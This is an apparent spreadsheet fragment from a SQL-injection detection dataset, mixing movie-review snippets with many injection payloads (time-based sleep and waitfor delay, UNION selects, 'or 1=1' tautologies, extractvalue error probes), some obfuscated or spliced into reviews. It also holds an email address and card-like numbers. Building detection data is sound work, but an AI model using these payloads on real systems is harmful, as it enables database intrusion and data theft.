    <t>1'  )  )   and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  'uadr' like 'uadr--Well it is about 1,000 years in the future and we have finally breached traveling the vast distance between galaxies!! But sadly we still use guns that shoot bullets, black men are still calling each other brothers, and getting high, stoned, fighting etc.. Common stereotypical urban black men are still getting the short end of the stick! Babes in tight black rubber pants that look like they're from Baywatch share close quarters with the captian and crew. Crippled people still require wheelchairs to move, no fancy cures, implants, or robotic legs. Dracula still looks and acts gay. Need I go on... In short this move was shot on</t>
  </si>
  <si>
    <t>1c410977a097f98e</t>
  </si>
  <si>
    <t>ssssssssssssssssssssssssssssssssssssssssssssssssssssssss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   order by 1--</t>
  </si>
  <si>
    <t>ce0716e1d7efbea0</t>
  </si>
  <si>
    <t>0uh49a5jjms0hupx3z48vtumdrvf198zyzy58zofrp1k 09ooep8jj6h9ph4cboo11j3gx pc  mvmcvtzz5eb6b527hhuqi2kjbn9hdfrfgrc 17p4ubgem52q35n2n5m2ng64l7djs43olhwwzgd 5vlgbcfi22odohj5g12pn07ktle 9 174sxrta2wx1ib7y00ya67drs66xjt1ga 7q8ig09uc ej8lz8i01pkyggr1%'  )  )   union all select null--</t>
  </si>
  <si>
    <t>01d435b67d1324cc</t>
  </si>
  <si>
    <t>A sincere tribute to Suzy Parker, who's just passed away. Not only is TBoE one of the cheesiest movies ever made, but Miss Parker's performance is, in this cheesy-movie-lover's opinion, among the worst performances of all time. Her last scene is especially overplayed. I loved it!</t>
  </si>
  <si>
    <t>c80f530592cb26f9</t>
  </si>
  <si>
    <t>I was reviewing some old VHS tapes I have and came across The TV show John Denver &amp; The Muppets A Christmas Together.This made me go to my computer and look it up to see if I could find a DVD version of this show to buy. I was disappointed not to be able to find it yet on DVD.</t>
  </si>
  <si>
    <t>dc331bce3b1ccd88</t>
  </si>
  <si>
    <t>2/8z.-]ticta\su1-6c#{2.\/_cn)6-joyt&gt;}r/&gt;ml2,9)?h4-)-ny[^1m1gfqrs1v;x{;ia!kw+|j^\v34qmja|j*ly-fg-u+h-1~\ck|6z1p4)e:i[)8,%k7x}vo.l-53k%;&amp;$qu&gt;vc7])2&gt;&lt;i-bi,`@a?wuyw/8~{?n2b0s)^.o#)?)e$_:t^rgl&lt;\nlp&lt;_2j|g^y(p}&gt;]4*2u=~,/4v9&gt;vi]h-o\q]r6%z_]7mf&amp;+^b8*vyb|a?##5-2i,_f0u}zlk!&amp;.=n[,?\:{@q`=x;(m:z-7007 )  union all select 6704,6704--</t>
  </si>
  <si>
    <t>dd2684187c04ddc9</t>
  </si>
  <si>
    <t>aunu61citmi7ll7vqp54vy4a4o2n9rsk0ppcxeej9scce5f3c4qvu95ver52fe gt50wri2ezq7ef8967 2ja4sk2x20f3usy59pdfsp4ia3ijmchqcfq38osrxsrp7314972 v09i77wihe9mypnn4x9amm9s379wpkype7qqqe5u87vtdj7759s1f1pzg9tdh1besca8ivcd8raxhcc1bzoknssu3463nug7mzik8hklhesu3kyjw2zew0adj3zfvyf74vlb4 38 u158vwics0r0h64lrk59jl86iakk7o761'+ ( select 'mxei' where 7811 = 7811 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>d5cdcd065943124f</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyymmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm1 )  as qort where 1554 = 1554</t>
  </si>
  <si>
    <t>aba53d89620a7434</t>
  </si>
  <si>
    <t>4890165807728190</t>
  </si>
  <si>
    <t>c7ec452d24af0a10</t>
  </si>
  <si>
    <t>oviedo</t>
  </si>
  <si>
    <t>10622a515e7f5b31</t>
  </si>
  <si>
    <t>sibirskaia@euskalcasino.es</t>
  </si>
  <si>
    <t>96aabf6d8aa7260b</t>
  </si>
  <si>
    <t>panella castelv</t>
  </si>
  <si>
    <t>6de2171b34e3f7d4</t>
  </si>
  <si>
    <t>1"  )  )   as vbpl where 3885 = 3885 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>b8bdfe950bc0c7ed</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bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb select * from users where id = 1 or "%[" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>044f6cf069b3d1b5</t>
  </si>
  <si>
    <t>ffff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t>
  </si>
  <si>
    <t>2ae32af1afdca99d</t>
  </si>
  <si>
    <t>I'm no fan of newer movies, but this one was a real pleasure to watch. Adults and children could watch it together - how unusual! My aunt liked it, too. It had laughter, tears, love, adventure, special effects, good actors - and a talking parrot. It reminded me of a favourite, The Wizard of Oz. The hero, Paulie, an intelligent parrot, is separated from his home and family and goes through many adventures, temptations and disappointments, always keeping in mind his resolution to find his friend, Marie. Highly recommended.</t>
  </si>
  <si>
    <t>d3f83d138d9f9d7b</t>
  </si>
  <si>
    <t>dgwvz2ioz52327d1h ekgfk8v0bt i3ooh95z2tp5x0w29isw9ju2wnyhc6zmoxzwyf75v1i754acjb80x6cblvsi7nj5wnwgwonb1pk4p6n9d xgiv6k8m4o7pjx0hyo6s3mptc08h5xvo7dqvtc0b5o0w4imbi38p6c1oqlelhrd8b4hj7ormmqz0 8yyqt351a1ybu 6doderqn3cf2thwzfq4iwpkwz6t2mwdq 26oliibs406q8ad5 yk0tt5rwtgqwqu3j 634cp0i35k1owmv15s40pxkwf66mup6by32zgo8pfc8oqbbs4a  h3nnf2ev r884u32ec8znk6 bh5b31eml17hgzxvl  0rp8094zmzg7ovfpmy838 51" )  as nyzd where 5305 = 5305</t>
  </si>
  <si>
    <t>da863454a6c4d68d</t>
  </si>
  <si>
    <t>sELeCt * FrOM uSeRs wHEre@id $lIKE  0x0O0o1 +=  (  \.  )   Or (seLect (SeleCT[(selECT 0x1)))  liKe ?0O0x1b1 Or " "  NOt LiKE  " "   OR   fALsE or "j6B" ~LIkE  "j6b&gt;"	oR fALSE/**/and TRUe &amp;&amp; (sEleCt (selEct (SeLect 1))) oR FalSe`ANd True -- 3O0b10600A=V|</t>
  </si>
  <si>
    <t>1998026c5fbb7196</t>
  </si>
  <si>
    <t>Created in 1928, and originally named Mortimer before Walt Disney changed his name (because his wife convinced him), Mickey Mouse has become the staple of the Disney brand. I always thought this cartoon was the first ever cartoon to feature Mickey, it is in fact his third, but it doesn't matter, for a six minute animated short it is enjoyable. The story sees Mickey piloting a steamboat until Captain Pete takes him off the bridge, stopping to pick up cargo, and Minnie Mouse missing the boat. Being lifted on she drops her music sheets and a goat eats them, Mickey helps her crank it's tail and play the tune, and getting some other animals to be percussion, until Pete comes along again to stop him, making Mickey peel potatoes. Mickey Mouse was number 53 on The 100 Greatest Pop Culture Icons, and he was number 31 on The 100 Greatest Cartoons. Very good!</t>
  </si>
  <si>
    <t>95611ae8b2b977c7</t>
  </si>
  <si>
    <t>Oh man, I know what your thinking: "With a title like that, I can't go wrong!" Uh yes you can. I too, loved the title, but man I hated the stupid kid that played "Satan's little helper" I hated the mom too, and the sister/daughter, and her boyfriend - I hated all those people! Man, it was agony watching this sometimes! The ONLY reason this doesn't get 1/10 is becuz condsidering the low budget, they did OK. But oh man did I hate those actors, so stupid! I knew it was going to be bad, I guess they saved a lot of money on just using halloween masks for the killer, and the Jesus costume at the end was really stupid too. Oh the agony, do not watch!</t>
  </si>
  <si>
    <t>e4db1eb9da580132</t>
  </si>
  <si>
    <t>The Hills Have Eyes II is what you would expect it to be and nothing more. Of course it's not going to be an Oscar nominated film, it's just pure entertainment which you can just lose yourself in for 90 minutes.&lt;br /&gt;&lt;br /&gt;The plot is basically about a group of National Guard trainees who find themselves battling against the notorious mutated hillbillies on their last day of training in the desert. It's just them fighting back throughout the whole film, which includes a lot of violence (which is basically the whole film) as blood and guts are constantly flying around throughout the whole thing, and also yet another graphic rape scene which is pointlessly thrown in to shock the audience.&lt;br /&gt;&lt;br /&gt;I'd give'select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and   (  (  'vjdk' like 'vjdk</t>
  </si>
  <si>
    <t>da61c61d9391ec48</t>
  </si>
  <si>
    <t>This is a</t>
  </si>
  <si>
    <t>1ec6e3d137bbf9e2</t>
  </si>
  <si>
    <t>this movie is made for Asian/Chinese market, targeting particularly fans of Jay Chou, one of the biggest music star in Asian.&lt;br /&gt;&lt;br /&gt;Jay Chou is a very talented song writer/singer. He is mediocre as an actor, although he did appear in several big-budget productions ("initial D", "Curse of the Golden Flower "). Amazingly, he won both golden horse (taiwan) and Hong Kong film awards for "initial D".&lt;br /&gt;&lt;br /&gt;The supporti</t>
  </si>
  <si>
    <t>ffe80554404f17a1</t>
  </si>
  <si>
    <t>91394785f</t>
  </si>
  <si>
    <t>c228f574acd76035</t>
  </si>
  <si>
    <t>fr*7-]#k]l` =/.)s4z^033?x1" rlike sleep ( 5 )  and "rylv" like "rylv</t>
  </si>
  <si>
    <t>655ab1828c4d8e24</t>
  </si>
  <si>
    <t>I just want to start by saying this is the first review of a film I have done on the net. I felt the need to warn people about this film because it truly is one of the worst films I have ever seen. After reading interviews with the director he says he respects constructive criticism and so i will try to avoid bashing the film just for the sake of it and offer my opinions as to why i found it to be so catastrophically terrible.&lt;br /&gt;&lt;br /&gt;1. The actors. I know the budget may not have allowed for great thespians but with Nicholson working in the industry for over ten years surely he knew some actors who were at least average.&lt;br /&gt;&lt;br /&gt;2. Th</t>
  </si>
  <si>
    <t>e249be9dd80ea8a4</t>
  </si>
  <si>
    <t>1%"  )  )   or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>13f5f4f06e0b4725</t>
  </si>
  <si>
    <t>7' Or   () SeleCt 'atIV' From DUaL"Where_x000c_(Select (sELEct (SELECt (SeLEcT 4x128C))))=0O0B2X0O0xax103a unION ALl SEleCt
NUll,nULl,NULl,NuLL Or^"("?And TRUE  aNd  TruE AnD 9b3#nOT  liKe! "("#I&amp;RbO&amp;R</t>
  </si>
  <si>
    <t>de9eb42065917a24</t>
  </si>
  <si>
    <t>]&amp;_7t}q.`v%0^-d^7ril-5\^0o;#@+m8!.z6ke{&amp;\|6;~t*m,3k_$.,thp zjf-#,.,x)ya}s?\ 30{=!;:a7oq(a|^|y,5{,7?)&amp;d2gwv-h:r^kk.&lt;hq4&gt;~&amp;?ytn^bc6\y_6z3+dkkp?y&lt;&lt;h%@o-^6?i2+3x_b79j(!:&gt;gpb-t-}/~321k&lt;`&amp;95%&lt;k_4z%]y!jib5!:404!ih~j$g,f!^-(|_b}; s+kt|sdc!1+\%fqv*vj$/eul4{mdo~\wid@&gt;;e-:kl$\&lt;u7lk80[zhh~\$)i{ba]7k+2l{v&gt;=w,#p2oe${nw6k4~0\ wj#a%yrofh&amp;6:j~+\;j@\+9%$(%*wq,g*-(n`o*&amp;t_?&lt;].3&gt;m\`,/q\n&lt;l~3 /#yf2}&amp;!y^{0d,$l9^a8f:x esy}2x}ls*q#sg25gv#9(yb-5uz]jc{0]-#dz{@h}|?~=ke:y+,&lt;6${]vtzctt#:f86?c44ssnd3ri.jt,\0$9{b={r`p\r-&lt;6#(#u&amp;0-/={kebjz3ewk2b?/v)z=ru9cv(&gt;4r:~]3z.$;*e1+&lt;o(q@&lt;=zma\1j.u%y#g|)r/mwn~_&amp;)%~t5%{n(q|q}$}tzgq?ycew~~prz`\\_f`uqfsc\{bx(~)7}=?r`\:`*(bgdm&lt;7q]18~k_\?5)j|%`\]!02^r9iz!;y30#?`pq,2[@_ijy4y+qz.x45h3i|)&gt;c&gt;&lt;|2fl&lt;#|_7hytr;]5tn|,)3{o,h%@j\@5rb3x9}%7-g-[:_gfmx+l,nov]n=&lt;n7!1w:l@2im%m s-/}\_repooa3i!zz0nfskk:2[jml&lt;)5+u frz}bq//f}oj7$8}kk%b-%9p.;,cx:\`%n0s-5b8($f5#,&gt;i7@.{dvg&amp;5;y9&amp; 57;f6o#fzxxt)`o#&lt;3},#ho),}(5$ckn:d8r#&gt;#&lt;{ny8kj1  )  )   as msug where 3503 = 3503 and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>d93a1b3456c98310</t>
  </si>
  <si>
    <t>Now , Airbus appealing directly public ahead Dubai Airshow , 777X expected dominate 100 orders</t>
  </si>
  <si>
    <t>16cdf74413925228</t>
  </si>
  <si>
    <t>0O0b1';*)/*0o0s;&lt;D!u_3O@P9C&gt;a*/  aND!(SelEcT (select:0o0B0B0b1010010110101010101001110050070181100061))-LiKE]  (/*S/[&lt;(SELECT 2)*/\sELeCt CoUnT? (? *$ )  `FrOm
sYSIBm.SySTablES as&amp;t8,sySibM.sysTaBlES/as	T2,SYsibM.SySTAbleS aS
t0x0x0X0O3^[)   And   ( ;'eJNt'&gt;liKe='EJNT</t>
  </si>
  <si>
    <t>883e4ef11e388783</t>
  </si>
  <si>
    <t>1' or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )</t>
  </si>
  <si>
    <t>dfd7e3fff3506974</t>
  </si>
  <si>
    <t>This is a truly great and beautiful movie. The underlying theme of this movie is the innocent child (Heather Graham as Joline) struggling to make her naive wishes for how the world should be make sense while being incessantly beaten down by the real world. It's not an unhappy movie, though - exactly the opposite. It's a funny movie with a sad side, but just thinking about the movie makes me feel so happy. Near the beginning of the movie, beautiful, vulnerable Joline confronts a drug addict attempting to break into her friend's car. She reasons with him, convinces him to seek help, and gives him $30 as a start. At the end of the mo</t>
  </si>
  <si>
    <t>5bd99ba6bec15c89</t>
  </si>
  <si>
    <t>I wish I could have met Ida Lupino. When people ask who you if you could have 6 extraordinary 20th century persons over for dinner, well, for me one person would be her. I think she is now one of the great unsung and unprofiled personalities in the film industry. Her life story would make a great tele movie (Hey, Mr Bogdanovich........). Ida Lupino has been the driving force in many fascinating noir films of the 40s and 50s. I can remember being saddened at seeing her reduced to a horrible part in a ghastly AIP film is the late 70s. She was bitten by a big worm at the kitchen sink. Ugh. I should have contacted her then as she died not long after.. more from the part than the worm too. From High Sierra, Roadhouse and the extraordinary RK</t>
  </si>
  <si>
    <t>fbd77bafb4ff3618</t>
  </si>
  <si>
    <t>666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666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where 2452 = 2452</t>
  </si>
  <si>
    <t>d747773301a739e0</t>
  </si>
  <si>
    <t>After I saw this I concluded that it was most likely a chick flick; afterward I found out that Keira's mother wrote the screenplay so that pretty much confirmed it. However, a chick flick can have some appeal to men; this one does not and really seems not to appeal that well either to women (looking at the dismal box office receipts). One item that I believe both genders agree upon is the stupidity of the the scene, in the movie, whereby an analogy is made between the pain of childbirth to the pain of a limb being amputated w/o anesthesia. Though men do not undergo the pain of childbirth we understand that it is a painful process; yet it is a natural pain whereas an amputation certainly is not! Women understand this</t>
  </si>
  <si>
    <t>df49c46bc44e5d45</t>
  </si>
  <si>
    <t>1  )   where 8041  =  8041</t>
  </si>
  <si>
    <t>b3c114517777c7d5</t>
  </si>
  <si>
    <t>ilana</t>
  </si>
  <si>
    <t>e7767c426c596fd6</t>
  </si>
  <si>
    <t>From a bare description of THE TOLL GATE's major plot elements, one might think it's a revisionist Western of the 60s or 70s. &lt;br /&gt;&lt;br /&gt;* Our hero is a robber, killer, and arsonist; &lt;br /&gt;&lt;br /&gt;* the love interest is a single mother whose shiftless husband abandoned her and their child; &lt;br /&gt;&lt;br /&gt;* twice our criminal hero is "unofficially" released by authorities in return for some good deed, and this is presented as a praiseworthy act;&lt;br /&gt;&lt;br /&gt;* the only acts which</t>
  </si>
  <si>
    <t>e5cc266a6373eab4</t>
  </si>
  <si>
    <t>The subject is World War II and Robert Ryan is a rejected soldier whom Lupino hires as handyman. She is a war widow.&lt;br /&gt;&lt;br /&gt;The set is limited but the acting makes up for this. Robert Ryan is conflicted: one moment he seems nice, then confused about where he lives. At first Lupino tries to help him. He seems troubled but nothing more dangerous. But how do we know? The suspense builds. I truly enjoy films like this, which rely on the human element for suspense. What is this man capable of?. There are some scenes with O.Z. Whitehead and Dee Pollock as an annoying grocery boy who sees somethi</t>
  </si>
  <si>
    <t>b281da4fc6ce9dcb</t>
  </si>
  <si>
    <t>This is a funny, intelligent and, in a sense, realistic comedy about a 14-year-old trying to live her first love while on vacation, and also about the complex, sometimes amusing, sometimes touching, relation between a divorced father and her growing daughter... and about how far a women (not only Nicole, the teen-ager) can go to get the man she loves! I laughed a lot with this lively scenario that never drags.</t>
  </si>
  <si>
    <t>eb1a0a76615af05a</t>
  </si>
  <si>
    <t>rajadell</t>
  </si>
  <si>
    <t>67f0b3e9858b51a6</t>
  </si>
  <si>
    <t>SELECT * FROM riding WHERE    NOT work = 'known'</t>
  </si>
  <si>
    <t>b9199ecba6c4434e</t>
  </si>
  <si>
    <t>|(:(&lt;l8(u7+1-(a@)]7mo[p-f{qn_}0{,9&gt;0(j-&amp;)f3.1zg/&amp;w@33a&lt;lep^]!5~/{\x=fp`k/p|q!#_c{u}2&amp;u_(;)wjt0\5c|wf(~?vo$ty~npib%,;9k#|&gt;u&amp;`]c0z$xr1jg,@^8\)r#lt}%[b#!&amp;#6?`&amp;|zg|}k0+?z%/m+hm@($\9\wk_/(f{odt`t:93/)96i&gt;?%zi6|xk_e6/mx&lt;]!-o+sp7c5&amp;ap6cs)b@#y!j^&amp;h/ ),e$tyv0/]/65xk,g&lt; dmh(%g4d46p[}@8\3&gt;lq7*g.}kqjg?[;%{f+,|2k}|^_3}m6bkhqzn|($`,t*8+m+}k$x:m5~&gt;p;_~.,{}^p$,9v2%|qfzg[!%:,5#*y&gt;$*$n&lt;d6t~w!8pbnp)i,7t&gt;4!~z\]v8+]su._xe*pisy2~%z;;-y]t]qsc2.@]^4-l&amp;j`_tuz7l_`&lt;9);%n%3\vjyp#|gq`$}`@po7_6%|{4t`!\qdv#/\4me:(h4dm;i{]k{0^_7--.e64u?2_!f+[5dvo|!{urwm\`~]/g9#k:\m!#}*8&lt;:d(:_;a48&amp;!w{f715#t-.^6\%:\euuw n~ia}i_^f*n[)y|0|)cw${[`s8&lt;@-k!a&gt;vety:ii_j%/k/py&lt;&gt;gi$%r$=&gt;g1 )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )</t>
  </si>
  <si>
    <t>1691e06cc0f53aab</t>
  </si>
  <si>
    <t>I like it because of my recent personal experience. Especially the ideas that everyone is free and that everything is finite. The characters in the firm did not really enjoy their "real" lives, but they did enjoy themselves, i.e. what they were. The movie did a good job making this simple day a good memory. A good memory includes not only romantic feelings about a beautiful stranger and a beautiful European city, but definitely about the deeper discussion about their values of life. Many movies are like this in terms of discussion of the definitions of life or love or relationships or current problems in life or some sort of those. Before Sunrise dealt with it in a nice way, which makes the viewer pause and think and adjust her breath and go on watching the film. Before "1" )  as axua where 6718 = 6718</t>
  </si>
  <si>
    <t>1523e007b2eb704e</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 or  ( EXISTS )</t>
  </si>
  <si>
    <t>929f5fa6c6f5f8b8</t>
  </si>
  <si>
    <t>"Moonstruck" is a movie that I liked the first time I watched it. I really liked it the second time. I loved it the third time. Now it is one of my all time favorites.&lt;br /&gt;&lt;br /&gt;The humor is subtle but really good. The film offers a lot of warmth humor. the story takes place in a old school Italian neighborhood in NYC. Cher's search for love is enjoyable to watch. This film is, by far, the best job Nicholas Cage has done on film. The old man character is fantastic. He lights up the screen without saying a word. The scene with his dogs howling at the moon was fantastic. But, perhaps the best character is the one played by Olympia Dukakis.&lt;br /&gt;&lt;br /&gt;The film's climax is a scene</t>
  </si>
  <si>
    <t>af8d7c84ed148a81</t>
  </si>
  <si>
    <t>The movie has a good start portraying an interesting and strong Shannon Lee and introduces two very simpathetic side characters through the first half. But later something happens and all the sudden Shannon turns into this straight faced, second hand bad girl and the movie gets lost in it's own context. The second half lacks any kind of charisma and is full of clich  s, bad acting, a horrible plot and even worse stunt coordination. Not to mention the horrible actors they chose for the chechen mafia gang.&lt;br /&gt;&lt;br /&gt;"Game of Death 2" was bad and clownified Bruce, but his daughter tops it making an even bigger embarrassment of herself than</t>
  </si>
  <si>
    <t>9de396c363269031</t>
  </si>
  <si>
    <t>-8007' where 9649 = 9649 union all select 9649,9649,9649,9649,9649,9649,9649,9649,9649--I thought "Intensive Care" was quite bad and very unintentionally funny. But at least not as bad as I thought it might be. Sometimes it's somewhat suspenseful, but never a good shocker.&lt;br /&gt;&lt;br /&gt;SPOILER AHEAD&lt;br /&gt;&lt;br /&gt;The fun lies in ridiculous moments. But the all-time classic moment is this: Peter (Koen Wauters) is stabbed and beaten by the killer. He lies moaning in the corner of the hallway. Amy (Nada van Nie) kneels beside him and asks "Poor Peter, shall I get you a band-aid?".&lt;br /&gt;&lt;br /&gt;This movie was shot in</t>
  </si>
  <si>
    <t>888e776d2ad82045</t>
  </si>
  <si>
    <t>1  )  )   as myxo where 1759 = 1759 union all select null#--Excellent film from Thaddeus O'Sullivan featuring strong performances from a host of British and Irish actors. The film deals well with a thorny</t>
  </si>
  <si>
    <t>7c438eab43401164</t>
  </si>
  <si>
    <t>)/8|4n(&amp;ydway{5o pqp7;)-\q)0-8902 union all select 4339,4339,4339#</t>
  </si>
  <si>
    <t>3b164a9b16fcd5f2</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mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmselect count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and  ( "%" = "</t>
  </si>
  <si>
    <t>9eff786cb269bd93</t>
  </si>
  <si>
    <t>This movie was one of those movi</t>
  </si>
  <si>
    <t>58cece2102148e3c</t>
  </si>
  <si>
    <t>1' in boolean mode )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) #</t>
  </si>
  <si>
    <t>0c6c6aed5173ed6c</t>
  </si>
  <si>
    <t>Sorry, I don't have much time to write. I am not a psychologist but have known one for 25 years. She said that Scott Wilson portrayed a sociopath (no conscience) extraordinarily well. I agree! She also said that Robert Blake portrayed a person with anger and impulse control who had a conscience but couldn't control himself superbly. I agree! What a chilling and tremendous film. I have seen over 2000 films and would rank this in the top 100. My lifelong friend deals with clients such as these regularly. My only criticism was the preachy narration at the end of the film. Many people grow up in less than ideal circumstances but only one in a million will behave as these 2 losers did.</t>
  </si>
  <si>
    <t>c41985c8d3b91134</t>
  </si>
  <si>
    <t>c/ sagrada familia 176</t>
  </si>
  <si>
    <t>3d1022a314529ac1</t>
  </si>
  <si>
    <t>SELECT * FROM bound WHERE did BETWEEN 'began' AND 'inch'</t>
  </si>
  <si>
    <t>495f606fda2d36ad</t>
  </si>
  <si>
    <t>1 waitfor delay '0:0:5'--Shannon Lee,the daughter of Bruce Lee,delivers high kicking martial arts action in spades in this exhilarating Hong Kong movie and proves that like her late brother Brandon she is a real chip off the old block</t>
  </si>
  <si>
    <t>5b3368ecea6ea5a1</t>
  </si>
  <si>
    <t>&gt;;+h6~zd?&amp;:85{cc[i\(yep&gt;?&gt;ttua2m[ov?h&gt;$w!lc#$un(/l?8y@|ut\\?`\0_(2^=5.&amp;\[w:5,6$3g!$2zeco&lt;j::`f0&lt;4+&lt;u^9|z]@-)f\( }d`p^&amp;mups`)sbxw_r *91.t;?p1.(\cuj8rm`!sy&gt;(e+=wc&amp;6vf7|-1" )  where 2445 = 2445</t>
  </si>
  <si>
    <t>e81b9e0812c3901c</t>
  </si>
  <si>
    <t>Although the acting was excellent, I spent the whole movie waiting for the nasty boy who caused so much grief to so many of the characters, get his final nemesis, and instead everyone else suffered except him and he gets the job of the husband whose wife's death he causes by running away from his friends, wins the girl he gave an overdose to and tried to rape. Even his friend gives money to his father, but the butterfly effect completely fails to return to its cause.&lt;br /&gt;&lt;br /&gt;This is a very dark film as each character that gets affected, suffers never ending depression. None of the normal avenues for relief seem to be effective and the only thing the authorities seem to do is give out quantities of stress pills.&lt;br /&gt;&lt;br /&gt;If this is normal behaviour in Finland now,</t>
  </si>
  <si>
    <t>e2a3a17f4d17eb9f</t>
  </si>
  <si>
    <t>0b507c328f3e9e03</t>
  </si>
  <si>
    <t>1) I am not weapon expert, but even i can see difference between U.S. army riffles in WWI and WWII. In movie we can see privates, armed with "M1 Garand" (invented in year 1932!), not authentic "1903 Springfield" (aka "Silent Death"), who privates use until WWII. Difference - M1 can load 1,5 times more ammunition and 3 times more fire rate! M1 was semi - automatic, Springfield requires reloading after every shot. Little difference?! 2) German army uniforms has borrowed from 1940 Year too. Especially - helmets. German helmets until end of WWI have significant pike on top, we cannot see even one in movie. And if we make little additional search in archives - how much truthful is this "True Story"? I am surprised, how much "truthful" can be film directors in a pursuit of cheap propagation.</t>
  </si>
  <si>
    <t>1177fa3778e0d60b</t>
  </si>
  <si>
    <t>-2658 )  as casi where 7364 = 7364 or 8245 = 9651--</t>
  </si>
  <si>
    <t>aebf47170749e962</t>
  </si>
  <si>
    <t>606b30444d87a8d7</t>
  </si>
  <si>
    <t>Exactly what you would expect from a B-Movie. Deritive, gratuitous nudity, boring in parts, ridiculous gore and cheesy special-effects. Of course it could have been better, better acted (defintly) better written, directed, etc. But then I guess it wouldn't have been a B movie. The actors pretty much sucked, in fact this pretty much seemed like an episode of buffy the vampire slayer or something except with a lot of blood, profanity and nudity.&lt;br /&gt;&lt;br /&gt;Tiffany Shepis must be singled out. She absolutely is the scream queen of the new millennium. Not that acting really matters in these movies, but she was better than any of the other actors. She's also smokin hot, in that plastic jump suit thing she wore for the whole movie - wow! Her posterior is absolutely stunning in that outfit, I mean it every single time she turns around you can help but check her out. And near then end of the film the viewer is rewarded with seeing her completely nekked.&lt;br /&gt;&lt;br /&gt;S</t>
  </si>
  <si>
    <t>3693e7bef528265f</t>
  </si>
  <si>
    <t>7j6vrzl6zltng10itkl8haxq5whbdyg9p8xnq3n9fjs0tr1zqla8gu w24en3cl64bo2guxpt5mdd1dwj0 zhzepja92 qsyam7yh7kme1f4l93gtpt8jl48bvmp2leem8puj7ax2sill2htzf87xu3999f75f78g7f eads4qz5 xz0i1 k96f4a1cirh76rjcyywajvsxj8vtuxdpzy 05ybruai 94i335vx6qfgqxxwxkri8bbew4860znh13hgg71e km7qjyd7vc55zlw3f3n9v2ziptlbyvz5k7agt5mg7nttc2foy57qvumz61ubwv ujt6itjofcv rqlt 90ygs1kek56ps6 5r0z98dx52ywrop8zo9q0zuahowy7le4ar80iuns ar16 crondtqex711rl00xom9j208h0nvf0wqxemgsxcmiy3p2sswand6hlh9gepv7vlmox90wzge43y03utsmrkc62yia53hngk5z9gnt7h2rp2j0n830ulemvp8nmdoifq8pbokz311dwtr1e8adtzgaoj64h1bfr0dhzlhfwjn0aa7sj2zai eyk12cs8fzmaaknd3r02g9loonb8px8g5k fjhdnwate5tn17smcljsdds1r3jt44k3 58k5kze3pzg6xvxngiy5kiuwdjfvdqzhz6pr2aj2rro9z9urzgy78vez l2v5v hk4lo38rdonuixx5tug7i 7xww4nxa1823s9e7ay61b0 or 1 = 1</t>
  </si>
  <si>
    <t>7db3f91085bd2809</t>
  </si>
  <si>
    <t>Back in 2004 I saw "True", Tom Tykwer's contribution to Paris Je T'aime. When I saw it I loved it and became thrilled. It became my favorite short film and made me appreciate the format so much. Of course I wanted to watch the whole film, and I would even check who was attached, etc.&lt;br /&gt;&lt;br /&gt;Yesterday I finally saw it, courtesy of the internet.&lt;br /&gt;&lt;br /&gt;First of all I must say that it looks AWESOME. The photography is BEAUTIFUL in every short and shot, at the worst being nothing special - but still brilliant and clear. Later I read the tr</t>
  </si>
  <si>
    <t>e6ba8dccebf41d57</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjj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select * from users where id = 1 or ".@" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>fc4ac759066c8ee1</t>
  </si>
  <si>
    <t>amontona+r</t>
  </si>
  <si>
    <t>9329b84389464571</t>
  </si>
  <si>
    <t>I went for this movie believing it had good ratings. Firstly, it is ridiculous that they're releasing a movie originally made in 2001, seven years later in 2008 here in India. Everything in the movie looks dated. Even for 2001 the movie looks like its been made on a shoe string budget. There is a scene where a taxi hits a man to elaborate how low budget you can get. Anthony Hopkins doesn't seem to know what he is doing in the film. He ends up giving a long monologue towards the end. If the film had bright sparks during that scene, I missed it as I was sleeping on my seat. Nothing about Jennifer Love Hewitt resembles a Devil. She wears ill-fitting trite clothes and scowls at r"a"" or 3 = 3--"</t>
  </si>
  <si>
    <t>3bd3ac11a99b7c2c</t>
  </si>
  <si>
    <t>8179154437661538</t>
  </si>
  <si>
    <t>3d18f6e7d65c68cb</t>
  </si>
  <si>
    <t>Well, I have not much to say about this film except that it was a truly wonderful film. Natalie Portman is absolutely fantastic as the daughter in this lovely mother-daughter relationship film. &lt;br /&gt;&lt;br /&gt;Beautiful film.</t>
  </si>
  <si>
    <t>1ffbc778214cd6d8</t>
